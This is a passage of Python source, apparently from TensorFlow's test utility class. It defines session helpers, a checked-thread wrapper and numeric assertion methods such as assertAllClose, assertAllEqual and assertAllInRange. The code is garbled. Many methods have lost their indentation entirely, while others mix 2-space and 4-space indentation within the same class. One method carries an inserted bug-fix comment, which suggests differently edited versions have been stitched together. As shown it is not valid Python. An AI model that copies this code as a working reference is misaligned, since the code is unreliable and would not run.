actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
  def _eval_tensor(self, tensor):
    """Converts a single eager tensor (or composite) to its numpy value.

    Args:
      tensor: None, a callable producing tensors, or a (possibly composite)
        eager tensor.

    Returns:
      None, or the numpy-value counterpart: SparseTensorValue,
      RaggedTensorValue, IndexedSlicesValue, or a structure of ndarrays.

    Raises:
      ValueError: If the value cannot be converted (e.g. has no `.numpy()`).
    """
    if tensor is None:
      return None
    elif callable(tensor):
      # Lazily-built tensors: call, then evaluate whatever comes back.
      return self._eval_helper(tensor())
    else:
      try:
        # Composite tensors are unpacked into their *Value counterparts so
        # the result contains only numpy data.
        if sparse_tensor.is_sparse(tensor):
          return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
                                                 tensor.values.numpy(),
                                                 tensor.dense_shape.numpy())
        elif ragged_tensor.is_ragged(tensor):
          return ragged_tensor_value.RaggedTensorValue(
              self._eval_tensor(tensor.values),
              self._eval_tensor(tensor.row_splits))
        elif isinstance(tensor, ops.IndexedSlices):
          return ops.IndexedSlicesValue(
              values=tensor.values.numpy(),
              indices=tensor.indices.numpy(),
              dense_shape=tensor.dense_shape.numpy())
        # Convert tensors and composite tensors to numpy arrays.
        return nest.map_structure(lambda t: t.numpy(), tensor,
                                  expand_composites=True)
      except AttributeError as e:
        six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
  # pylint: disable=g-doc-return-or-yield
  @contextlib.contextmanager
  def session(self, graph=None, config=None, use_gpu=True, force_gpu=False):
    """A context manager for a TensorFlow Session for use in executing tests.

    Note that this will set this session and the graph as global defaults.

    Use the `use_gpu` and `force_gpu` options to control where ops are run. If
    `force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
    `use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
    the CPU.

    Example:

    ``` python
    class MyOperatorTest(test_util.TensorFlowTestCase):

      def testMyOperator(self):
        with self.session():
          valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
          result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
          invalid_input = [-1.0, 2.0, 7.0]
          with self.assertRaisesOpError("negative input not supported"):
            MyOperator(invalid_input).eval()
    ```

    Args:
      graph: Optional graph to use during the returned session.
      config: An optional config_pb2.ConfigProto to use to configure the
        session.
      use_gpu: If True, attempt to run as many ops as possible on GPU.
      force_gpu: If True, pin all ops to `/device:GPU:0`.

    Yields:
      A Session object that should be used as a context manager to surround
      the graph building and execution code in a test case.
    """
    if context.executing_eagerly():
      # Sessions are meaningless in eager mode; yield a sentinel that raises
      # a helpful error on any use.
      yield EagerSessionWarner()
    else:
      with self._create_session(graph, config, force_gpu) as sess:
        with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
          yield sess
  @contextlib.contextmanager
  def cached_session(self,
                     graph=None,
                     config=None,
                     use_gpu=True,
                     force_gpu=False):
    """Returns a TensorFlow Session for use in executing tests.

    This method behaves differently than self.session(): for performance reasons
    `cached_session` will by default reuse the same session within the same
    test. The session returned by this function will only be closed at the end
    of the test (in the TearDown function).

    Use the `use_gpu` and `force_gpu` options to control where ops are run. If
    `force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
    `use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
    the CPU.

    Example:

    ```python
    class MyOperatorTest(test_util.TensorFlowTestCase):

      def testMyOperator(self):
        with self.cached_session() as sess:
          valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
          result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
          invalid_input = [-1.0, 2.0, 7.0]
          with self.assertRaisesOpError("negative input not supported"):
            MyOperator(invalid_input).eval()
    ```

    Args:
      graph: Optional graph to use during the returned session.
      config: An optional config_pb2.ConfigProto to use to configure the
        session.
      use_gpu: If True, attempt to run as many ops as possible on GPU.
      force_gpu: If True, pin all ops to `/device:GPU:0`.

    Yields:
      A Session object that should be used as a context manager to surround
      the graph building and execution code in a test case.
    """
    if context.executing_eagerly():
      # Eager mode: yield the eager stand-in instead of a real session.
      yield FakeEagerSession(self)
    else:
      # Reuse (or lazily create) the per-test cached session; crash if the
      # caller passes arguments inconsistent with the cached one.
      sess = self._get_cached_session(
          graph, config, force_gpu, crash_if_inconsistent_args=True)
      with self._constrain_devices_and_set_default(sess, use_gpu,
                                                   force_gpu) as cached:
        yield cached
  @contextlib.contextmanager
  @deprecation.deprecated(None, "Use `self.session()` or "
                          "`self.cached_session()` instead.")
  def test_session(self,
                   graph=None,
                   config=None,
                   use_gpu=True,
                   force_gpu=False):
    """Use cached_session instead."""
    if self.id().endswith(".test_session"):
      self.skipTest(
          "Tests that have the name \"test_session\" are automatically skipped "
          "by TensorFlow test fixture, as the name is reserved for creating "
          "sessions within tests. Please rename your test if you have a test "
          "with this name.")
    if context.executing_eagerly():
      yield None
    else:
      if graph is None:
        # Legacy behavior: with the default graph, reuse the cached session
        # and tolerate inconsistent arguments across calls.
        sess = self._get_cached_session(
            graph, config, force_gpu, crash_if_inconsistent_args=False)
        with self._constrain_devices_and_set_default(sess, use_gpu,
                                                     force_gpu) as cached:
          yield cached
      else:
        # With an explicit graph, defer to session(), which creates a fresh
        # session for that graph.
        with self.session(graph, config, use_gpu, force_gpu) as sess:
          yield sess
  # pylint: enable=g-doc-return-or-yield
  class _CheckedThread(object):
    """A wrapper class for Thread that asserts successful completion.

    This class should be created using the TensorFlowTestCase.checkedThread()
    method.
    """

    def __init__(self, testcase, target, args=None, kwargs=None):
      """Constructs a new instance of _CheckedThread.

      Args:
        testcase: The TensorFlowTestCase for which this thread is being created.
        target: A callable object representing the code to be executed in the
          thread.
        args: A tuple of positional arguments that will be passed to target.
        kwargs: A dictionary of keyword arguments that will be passed to target.
      """
      self._testcase = testcase
      self._target = target
      self._args = () if args is None else args
      self._kwargs = {} if kwargs is None else kwargs
      self._thread = threading.Thread(target=self._protected_run)
      # Exception raised by the target, if any; reported when join()ed.
      self._exception = None
      # Set by join(); check_termination() fails if the thread never joined.
      self._is_thread_joined = False

    def _protected_run(self):
      """Target for the wrapper thread. Sets self._exception on failure."""
      try:
        self._target(*self._args, **self._kwargs)
      except Exception as e:  # pylint: disable=broad-except
        # Stash the exception so the joining (main) thread can report it.
        self._exception = e

    def start(self):
      """Starts the thread's activity.

      This must be called at most once per _CheckedThread object. It arranges
      for the object's target to be invoked in a separate thread of control.
      """
      self._thread.start()

    def join(self):
      """Blocks until the thread terminates.

      Raises:
        self._testcase.failureException: If the thread terminates with due to
          an exception.
      """
      self._is_thread_joined = True
      self._thread.join()
      if self._exception is not None:
        self._testcase.fail("Error in checkedThread: %s" % str(self._exception))

    def is_alive(self):
      """Returns whether the thread is alive.

      This method returns True just before the run() method starts
      until just after the run() method terminates.

      Returns:
        True if the thread is alive, otherwise False.
      """
      return self._thread.is_alive()

    def check_termination(self):
      """Returns whether the checked thread was properly used and did terminate.

      Every checked thread should be "join"ed after starting, and before the
      test tears down. If it is not joined, it is possible the thread will hang
      and cause flaky failures in tests.

      Raises:
        self._testcase.failureException: If check_termination was called before
          thread was joined.
        RuntimeError: If the thread is not terminated. This means thread was not
          joined with the main thread.
      """
      if self._is_thread_joined:
        if self.is_alive():
          raise RuntimeError(
              "Thread was not joined with main thread, and is still running "
              "when the test finished.")
      else:
        self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tf_type(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def evaluate_if_both_tensors(self, a, b):
if (tensor_util.is_tf_type(a) and tensor_util.is_tf_type(b) and
not isinstance(a, ops._EagerTensorBase) and
not isinstance(b, ops._EagerTensorBase)):
return self.evaluate((a, b))
else:
return (a, b)
  def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
    """Asserts two array-like values have identical shapes and close values.

    Args:
      a: the expected value, convertible to an ndarray.
      b: the actual value, convertible to an ndarray.
      rtol: relative tolerance.
      atol: absolute tolerance.
      msg: Optional message to report on failure.
    """
    (a, b) = self.evaluate_if_both_tensors(a, b)
    a = self._GetNdArray(a)
    b = self._GetNdArray(b)
    # When the array rank is small, print its contents. Numpy array printing is
    # implemented using inefficient recursion so prints can cause tests to
    # time out.
    if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
      shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
                            "%s.") % (a.shape, b.shape, b)
    else:
      shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
                                                                     b.shape)
    self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
    msgs = [msg]
    # np.allclose does not always work for our custom bfloat16 extension type
    # when type promotions are involved, so we first cast any bfloat16 arrays
    # to float32.
    a_dtype = a.dtype
    a = a.astype(np.float32) if a.dtype == dtypes.bfloat16.as_numpy_dtype else a
    b = b.astype(np.float32) if b.dtype == dtypes.bfloat16.as_numpy_dtype else b
    if not np.allclose(a, b, rtol=rtol, atol=atol):
      # Adds more details to np.testing.assert_allclose.
      #
      # NOTE: numpy.allclose (and numpy.testing.assert_allclose)
      # checks whether two arrays are element-wise equal within a
      # tolerance. The relative difference (rtol * abs(b)) and the
      # absolute difference atol are added together to compare against
      # the absolute difference between a and b. Here, we want to
      # tell user which elements violate such conditions.
      cond = np.logical_or(
          np.abs(a - b) > atol + rtol * np.abs(b),
          np.isnan(a) != np.isnan(b))
      if a.ndim:
        x = a[np.where(cond)]
        y = b[np.where(cond)]
        msgs.append("not close where = {}".format(np.where(cond)))
      else:
        # np.where is broken for scalars
        x, y = a, b
      msgs.append("not close lhs = {}".format(x))
      msgs.append("not close rhs = {}".format(y))
      msgs.append("not close dif = {}".format(np.abs(x - y)))
      msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
      msgs.append("dtype = {}, shape = {}".format(a_dtype, a.shape))
      # TODO(xpan): There seems to be a bug:
      # tensorflow/compiler/tests:binary_ops_test pass with float32
      # nan even though the equal_nan is False by default internally.
      np.testing.assert_allclose(
          a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
  def _assertAllCloseRecursive(self,
                               a,
                               b,
                               rtol=1e-6,
                               atol=1e-6,
                               path=None,
                               msg=None):
    """Recursively compares nested structures of array-likes for closeness.

    Args:
      a: expected value; may be a dict, namedtuple, list/tuple, or array-like.
      b: actual value, with a structure matching `a`.
      rtol: relative tolerance.
      atol: absolute tolerance.
      path: list of keys/indices leading to the current sub-structure, used to
        build error messages; None at the top level.
      msg: Optional message to report on failure.

    Raises:
      ValueError: If the structures of `a` and `b` do not match.
    """
    path = path or []
    path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
    msg = msg if msg else ""
    # Check if a and/or b are namedtuples.
    if hasattr(a, "_asdict"):
      a = a._asdict()
    if hasattr(b, "_asdict"):
      b = b._asdict()
    a_is_dict = isinstance(a, collections_abc.Mapping)
    if a_is_dict != isinstance(b, collections_abc.Mapping):
      raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
                       (path_str, path_str, msg))
    if a_is_dict:
      self.assertItemsEqual(
          a.keys(),
          b.keys(),
          msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
          (path_str, a.keys(), path_str, b.keys(), msg))
      # `path` is mutated in place and restored after each recursive call.
      for k in a:
        path.append(k)
        self._assertAllCloseRecursive(
            a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
        del path[-1]
    elif isinstance(a, (list, tuple)):
      # Try to directly compare a, b as ndarrays; if not work, then traverse
      # through the sequence, which is more expensive.
      try:
        (a, b) = self.evaluate_if_both_tensors(a, b)
        a_as_ndarray = self._GetNdArray(a)
        b_as_ndarray = self._GetNdArray(b)
        self._assertArrayLikeAllClose(
            a_as_ndarray,
            b_as_ndarray,
            rtol=rtol,
            atol=atol,
            msg="Mismatched value: a%s is different from b%s. %s" %
            (path_str, path_str, msg))
      except (ValueError, TypeError) as e:
        if len(a) != len(b):
          raise ValueError(
              "Mismatched length: a%s has %d items, but b%s has %d items. %s" %
              (path_str, len(a), path_str, len(b), msg))
        for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
          path.append(str(idx))
          self._assertAllCloseRecursive(
              a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
          del path[-1]
    # a and b are ndarray like objects
    else:
      try:
        self._assertArrayLikeAllClose(
            a,
            b,
            rtol=rtol,
            atol=atol,
            msg=("Mismatched value: a%s is different from b%s. %s" %
                 (path_str, path_str, msg)))
      except TypeError as e:
        # Augment the TypeError with the path and types before re-raising.
        msg = ("Error: a%s has %s, but b%s has %s. %s" %
               (path_str, type(a), path_str, type(b), msg))
        e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
        raise
  @py_func_if_in_function
  def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
    """Asserts that two structures of numpy arrays or Tensors, have near values.

    `a` and `b` can be arbitrarily nested structures. A layer of a nested
    structure can be a `dict`, `namedtuple`, `tuple` or `list`.

    Note: the implementation follows
    [`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
    (and numpy.testing.assert_allclose). It checks whether two arrays are
    element-wise equal within a tolerance. The relative difference
    (`rtol * abs(b)`) and the absolute difference `atol` are added together
    to compare against the absolute difference between `a` and `b`.

    Args:
      a: The expected numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested of
        structure of these.
      b: The actual numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested of
        structure of these.
      rtol: relative tolerance.
      atol: absolute tolerance.
      msg: Optional message to report on failure.

    Raises:
      ValueError: if only one of `a[p]` and `b[p]` is a dict or
        `a[p]` and `b[p]` have different length, where `[p]` denotes a path
        to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
        `[p] = [1]['d']`, then `a[p] = (6, 7)`.
    """
    # Ragged tensors get a dedicated comparison path.
    if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
      return self._assertRaggedClose(a, b, rtol, atol, msg)
    self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
  @py_func_if_in_function
  def assertAllCloseAccordingToType(self,
                                    a,
                                    b,
                                    rtol=1e-6,
                                    atol=1e-6,
                                    float_rtol=1e-6,
                                    float_atol=1e-6,
                                    half_rtol=1e-3,
                                    half_atol=1e-3,
                                    bfloat16_rtol=1e-2,
                                    bfloat16_atol=1e-2,
                                    msg=None):
    """Like assertAllClose, but also suitable for comparing fp16 arrays.

    In particular, the tolerance is reduced to 1e-3 if at least
    one of the arguments is of type float16.

    Args:
      a: the expected numpy ndarray or anything can be converted to one.
      b: the actual numpy ndarray or anything can be converted to one.
      rtol: relative tolerance.
      atol: absolute tolerance.
      float_rtol: relative tolerance for float32.
      float_atol: absolute tolerance for float32.
      half_rtol: relative tolerance for float16.
      half_atol: absolute tolerance for float16.
      bfloat16_rtol: relative tolerance for bfloat16.
      bfloat16_atol: absolute tolerance for bfloat16.
      msg: Optional message to report on failure.
    """
    (a, b) = self.evaluate_if_both_tensors(a, b)
    a = self._GetNdArray(a)
    b = self._GetNdArray(b)
    # types with lower tol are put later to overwrite previous ones.
    # Note complex64 shares the float32 tolerances.
    if (a.dtype == np.float32 or b.dtype == np.float32 or
        a.dtype == np.complex64 or b.dtype == np.complex64):
      rtol = max(rtol, float_rtol)
      atol = max(atol, float_atol)
    if a.dtype == np.float16 or b.dtype == np.float16:
      rtol = max(rtol, half_rtol)
      atol = max(atol, half_atol)
    if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
        b.dtype == dtypes.bfloat16.as_numpy_dtype):
      rtol = max(rtol, bfloat16_rtol)
      atol = max(atol, bfloat16_atol)
    self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
except AssertionError:
return
msg = msg or ""
raise AssertionError("The two values are close at all elements. %s" % msg)
  @py_func_if_in_function
  def assertAllEqual(self, a, b, msg=None):
    """Asserts that two numpy arrays or Tensors have the same values.

    Args:
      a: the expected numpy ndarray or anything can be converted to one.
      b: the actual numpy ndarray or anything can be converted to one.
      msg: Optional message to report on failure.
    """
    if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
      return self._assertRaggedEqual(a, b, msg)
    msg = msg if msg else ""
    (a, b) = self.evaluate_if_both_tensors(a, b)
    a = self._GetNdArray(a)
    b = self._GetNdArray(b)
    # Arbitrary bounds so that we don't print giant tensors.
    if (b.ndim <= 3 or b.size < 500):
      self.assertEqual(
          a.shape, b.shape, "Shape mismatch: expected %s, got %s."
          " Contents: %r. \n%s." % (a.shape, b.shape, b, msg))
    else:
      self.assertEqual(
          a.shape, b.shape, "Shape mismatch: expected %s, got %s."
          " %s" % (a.shape, b.shape, msg))
    same = (a == b)
    # NaN does not compare equal to itself, so treat matching NaN positions
    # as equal for floating-point dtypes.
    if (a.dtype in [
        np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
    ]):
      same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
    msgs = [msg]
    if not np.all(same):
      # Adds more details to np.testing.assert_array_equal.
      diff = np.logical_not(same)
      if a.ndim:
        x = a[np.where(diff)]
        y = b[np.where(diff)]
        msgs.append("not equal where = {}".format(np.where(diff)))
      else:
        # np.where is broken for scalars
        x, y = a, b
      msgs.append("not equal lhs = %r" % x)
      msgs.append("not equal rhs = %r" % y)
      # Handle mixed string types as a result of PY2to3 migration. That is, the
      # mixing between bytes (b-prefix strings, PY2 default) and unicodes
      # (u-prefix strings, PY3 default).
      if six.PY3:
        if (a.dtype.kind != b.dtype.kind and
            {a.dtype.kind, b.dtype.kind}.issubset({"U", "S", "O"})):
          a_list = []
          b_list = []
          # OK to flatten `a` and `b` because they are guaranteed to have the
          # same shape.
          for out_list, flat_arr in [(a_list, a.flat), (b_list, b.flat)]:
            for item in flat_arr:
              if isinstance(item, str):
                out_list.append(item.encode("utf-8"))
              else:
                out_list.append(item)
          a = np.array(a_list)
          b = np.array(b_list)
      np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
(a, comparison_target) = self.evaluate_if_both_tensors(a, comparison_target)
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
    """Assert element values are all less than a target value.

    Args:
      a: The numpy `ndarray`, or anything that can be converted into a numpy
        `ndarray` (including Tensor).
      comparison_target: The target value of comparison.
    """
    a, comparison_target = self.evaluate_if_both_tensors(a, comparison_target)
    arr = self._GetNdArray(a)
    # The whole array is less than the target iff its maximum is.
    self.assertLess(np.max(arr), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
    """Assert element values are all greater than or equal to a target value.

    Args:
      a: The numpy `ndarray`, or anything that can be converted into a numpy
        `ndarray` (including Tensor).
      comparison_target: The target value of comparison.
    """
    a, comparison_target = self.evaluate_if_both_tensors(a, comparison_target)
    arr = self._GetNdArray(a)
    # Checking the minimum suffices for the whole array.
    self.assertGreaterEqual(np.min(arr), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
    """Assert element values are all less than or equal to a target value.

    Args:
      a: The numpy `ndarray`, or anything that can be converted into a numpy
        `ndarray` (including Tensor).
      comparison_target: The target value of comparison.
    """
    a, comparison_target = self.evaluate_if_both_tensors(a, comparison_target)
    arr = self._GetNdArray(a)
    # Checking the maximum suffices for the whole array.
    self.assertLessEqual(np.max(arr), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
if np.ndim(value) == 0:
return [prefix + "[0] : " + str(value)]
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
                     target,
                     lower_bound,
                     upper_bound,
                     open_lower_bound=False,
                     open_upper_bound=False):
    """Assert that elements in a Tensor are all in a given range.

    Args:
      target: The numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor).
      lower_bound: lower bound of the range
      upper_bound: upper bound of the range
      open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
        than the default >=)
      open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
        than the default <=)

    Raises:
      AssertionError:
        if the value tensor does not have an ordered numeric type (float* or
          int*), or
        if there are nan values, or
        if any of the elements do not fall in the specified range.
    """
    target = self._GetNdArray(target)
    # Range comparison is only meaningful for ordered numeric dtypes.
    if not (np.issubdtype(target.dtype, np.floating) or
            np.issubdtype(target.dtype, np.integer)):
        raise AssertionError(
            "The value of %s does not have an ordered numeric type, instead it "
            "has type: %s" % (target, target.dtype))

    # NaN compares false against any bound, so it must be rejected explicitly
    # before the range check below.
    nan_subscripts = np.where(np.isnan(target))
    if np.size(nan_subscripts):
        raise AssertionError(
            "%d of the %d element(s) are NaN. "
            "Subscripts(s) and value(s) of the NaN element(s):\n" %
            (len(nan_subscripts[0]), np.size(target)) +
            "\n".join(self._format_subscripts(nan_subscripts, target)))

    # Human-readable interval notation for the error message, e.g. "(0, 1]".
    range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
                 str(upper_bound) + (")" if open_upper_bound else "]"))

    # For an open bound, equality with the bound is itself a violation,
    # hence the <= / >= comparison variants.
    violations = (
        np.less_equal(target, lower_bound) if open_lower_bound else np.less(
            target, lower_bound))
    violations = np.logical_or(
        violations,
        np.greater_equal(target, upper_bound)
        if open_upper_bound else np.greater(target, upper_bound))
    violation_subscripts = np.where(violations)
    if np.size(violation_subscripts):
        raise AssertionError(
            "%d of the %d element(s) are outside the range %s. " %
            (len(violation_subscripts[0]), np.size(target), range_str) +
            "Subscript(s) and value(s) of the offending elements:\n" +
            "\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
    """Assert that elements of a Tensor are all in a given closed set.

    Args:
      target: The numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor).
      expected_set: (`list`, `tuple` or `set`) The closed set that the elements
        of the value of `target` are expected to fall into.

    Raises:
      AssertionError:
        if any of the elements do not fall into `expected_set`.
    """
    arr = self._GetNdArray(target)
    # Unique elements of the flattened array that are absent from the set.
    unexpected = np.setdiff1d(arr.flatten(), list(expected_set))
    if np.size(unexpected):
        raise AssertionError("%d unique element(s) are not in the set %s: %s" %
                             (np.size(unexpected), expected_set, unexpected))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
    """Assert ndarray data type is equal to expected.

    Args:
      target: The numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or a list of such values.
      expected_dtype: Expected data type.
    """
    target = self._GetNdArray(target)
    # BUG FIX: the original only assigned `arrays` inside
    # `if not isinstance(target, list):`, so a list-valued `target` raised
    # NameError instead of checking each element's dtype.
    arrays = target if isinstance(target, list) else [target]
    for arr in arrays:
        self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
                                   expected_err_re_or_predicate):
    """Returns a context manager to enclose code expected to raise an exception.

    If the exception is an OpError, the op stack is also included in the message
    predicate search.

    Args:
      exception_type: The expected type of exception that should be raised.
      expected_err_re_or_predicate: If this is callable, it should be a function
        of one argument that inspects the passed-in exception and returns True
        (success) or False (please fail the test). Otherwise, the error message
        is expected to match this regular expression partially.

    Returns:
      A context manager to surround code that is expected to raise an
      exception.
    """
    if callable(expected_err_re_or_predicate):
        predicate = expected_err_re_or_predicate
    else:

        def predicate(e):
            # For OpErrors, extend the searched text with the chain of
            # originating ops so the regex can match anywhere in the op stack.
            err_str = e.message if isinstance(e, errors.OpError) else str(e)
            op = e.op if isinstance(e, errors.OpError) else None
            while op is not None:
                err_str += "\nCaused by: " + op.name
                op = op._original_op  # pylint: disable=protected-access
            logging.info("Searching within error strings: '%s' within '%s'",
                         expected_err_re_or_predicate, err_str)
            return re.search(expected_err_re_or_predicate, err_str)

    try:
        yield
        # Reaching this point means the body did not raise at all.
        self.fail(exception_type.__name__ + " not raised")
    except Exception as e:  # pylint: disable=broad-except
        # Wrong exception type or a non-matching message both fail the test.
        if not isinstance(e, exception_type) or not predicate(e):
            raise AssertionError("Exception of type %s: %s" %
                                 (str(type(e)), str(e)))

# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
    """Returns a context manager asserting an `errors.OpError` is raised.

    Shorthand for `assertRaisesWithPredicateMatch(errors.OpError, ...)`.
    """
    return self.assertRaisesWithPredicateMatch(errors.OpError,
                                               expected_err_re_or_predicate)
def assertRaisesIncompatibleShapesError(
        self, exception_type=errors.InvalidArgumentError):
    """Returns a context manager expecting a shape-incompatibility error.

    Matches the common messages emitted when operand shapes cannot be
    broadcast or are required to be equal.
    """
    return self.assertRaisesWithPredicateMatch(
        exception_type, r"Incompatible shapes|Dimensions must be equal|"
        r"required broadcastable shapes")
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
